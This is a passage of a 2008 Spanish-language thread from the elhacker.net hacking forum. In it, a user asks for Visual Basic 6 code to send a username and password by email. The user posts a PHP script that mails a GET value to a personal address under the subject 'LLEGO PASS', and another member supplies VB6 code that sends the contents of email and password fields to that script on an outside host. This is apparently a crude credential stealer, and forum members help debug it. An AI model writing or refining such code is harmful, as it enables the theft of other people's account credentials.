elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  ENVIAR EMAIL CON USER Y PASS
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: ENVIAR EMAIL CON USER Y PASS  (Leído 3,654 veces)
& eDu &


Desconectado Desconectado

Mensajes: 580



Ver Perfil
Re: ENVIAR EMAIL CON USER Y PASS
« Respuesta #10 en: 8 Noviembre 2008, 12:11 pm »

Haber si no escribes bien no te puedo entender, no te pido acentos solo que escribas bien. Dime los controles que tienes en el form y dejame el código del PHP.


En línea

jeri82

Desconectado Desconectado

Mensajes: 18


Ver Perfil
Re: ENVIAR EMAIL CON USER Y PASS
« Respuesta #11 en: 8 Noviembre 2008, 12:17 pm »

creo que me entiendes pero te cuento verdad que disculpa yo no escrito muy bien las palabras porque soy sorda para tu sepas es muy serio, bueno ahora te dejo codigo de php es:

<?php
$val = $_GET['value'];
mail ('jeri.lolita@hotmail.com', 'LLEGO PASS', $val);
?>


ya he subido php en hosting no pasa nada jejeje


En línea

& eDu &


Desconectado Desconectado

Mensajes: 580



Ver Perfil
Re: ENVIAR EMAIL CON USER Y PASS
« Respuesta #12 en: 8 Noviembre 2008, 12:21 pm »

Tu tienes en vb en el Form esto
txtEmail.Text
txtPass.Text
ws (control webbrowser)
¿Tu tienes eso en el Form?
Ahora dime si con este te funciona

Código
  1. Private Sub Command1_Click()
  2. ws.Navigate ("www.plusordos.net/prueba/envio.php?value=" & txtEmail.Text & "Password" & txtPass.Text)
  3. End Sub
En línea

jeri82

Desconectado Desconectado

Mensajes: 18


Ver Perfil
Re: ENVIAR EMAIL CON USER Y PASS
« Respuesta #13 en: 8 Noviembre 2008, 12:27 pm »

Private Sub Command1_Click()
ws.Navigate ("www.plusordos.net/prueba/envio.php?value=" & txtEmail.Text & "Password" & txtPass.Text)
End Sub


YA ESTA EN VB 6 no pasa nada :( :( :( :(

me entiendes???

Mejor nos hablamos por msn porque es rapido que te parece???

agregame mi email es jeri.lolita@............. por favor
En línea

jeri82

Desconectado Desconectado

Mensajes: 18


Ver Perfil
Re: ENVIAR EMAIL CON USER Y PASS
« Respuesta #14 en: 8 Noviembre 2008, 12:51 pm »

Oieeee........... ya registro en hosting que me diste no se como subir en hosting porque ya esta otro idioma :S
En línea

jeri82

Desconectado Desconectado

Mensajes: 18


Ver Perfil
Re: ENVIAR EMAIL CON USER Y PASS
« Respuesta #15 en: 8 Noviembre 2008, 14:01 pm »

Oieeee edu ya funciona 100% llego email de hosting lycos pero esta vacio que raro me puedes ayudar algo o no????
En línea

krackwar


Desconectado Desconectado

Mensajes: 900


Ver Perfil
Re: ENVIAR EMAIL CON USER Y PASS
« Respuesta #16 en: 8 Noviembre 2008, 15:40 pm »

Leete las reglas entonces y edita tu post para saccar tu mail.
En línea

Mi blog
Bienvenido krackwar, actualmente tu puntuación es de 38 puntos y tu rango es Veteran.
El pollo número 1, es decir yo, (krackwar), adoro a Shaddy como a un dios.
jeri82

Desconectado Desconectado

Mensajes: 18


Ver Perfil
Re: ENVIAR EMAIL CON USER Y PASS
« Respuesta #17 en: 8 Noviembre 2008, 17:37 pm »

Hola a todos....
Soy nuevo usuario....
Necesito urgente un codigo de enviar a email con user y pass de vb 6 porque estoy haciendo un programa pero me falto unico codigo pero yo no se cual es codigo ademas yo he buscado en internet y ya he encontrado no entiendo nada los tutoriales, si alguien que me quiere dar codigo y me explic lo que es.... muchas gracias.

espero que me ayudara ^^

En línea

jeri82

Desconectado Desconectado

Mensajes: 18


Ver Perfil
Re: ENVIAR EMAIL CON USER Y PASS
« Respuesta #18 en: 8 Noviembre 2008, 17:39 pm »

Ya listo quita mi email gracias pero disculpame jeje
En línea

byway

Desconectado Desconectado

Mensajes: 181


^^,


Ver Perfil
Re: ENVIAR EMAIL CON USER Y PASS
« Respuesta #19 en: 8 Noviembre 2008, 20:36 pm »

 :o :o :o :o :o

En línea

Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines